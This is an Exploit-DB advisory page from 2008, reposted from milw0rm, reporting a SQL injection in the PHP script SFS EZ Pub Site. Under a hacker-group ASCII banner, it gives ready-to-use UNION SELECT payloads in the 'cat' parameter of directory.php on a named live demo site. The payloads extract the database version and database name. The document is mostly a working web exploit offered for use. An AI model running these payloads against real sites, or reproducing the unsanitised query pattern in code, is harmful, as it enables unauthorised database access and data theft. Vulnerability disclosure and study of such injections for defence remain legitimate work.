SFS EZ Pub Site - SQL Injection

EDB-ID:

6923

Author:

Hakxer

Type:

webapps

Platform:

PHP

Published:

2008-11-01

###########################################################################
      ______    __  __   ______          __                ______                   
     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
        /____/                                           

# Discovered by : Hakxer
# Type Gap : SQL Injection
# Script : 	SFS EZ Pub Site 
# Greetz : Allah , Egyptian x hacker , Str0ke  :) 
##########################################################################

# [~] Poc : 
http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/*
# [~] Exploit :
http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,database(),9,10,11,12,13,14/*
OR
http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/*
		

# Proud To be a Muslim #
#_=END=_#

# milw0rm.com [2008-11-01]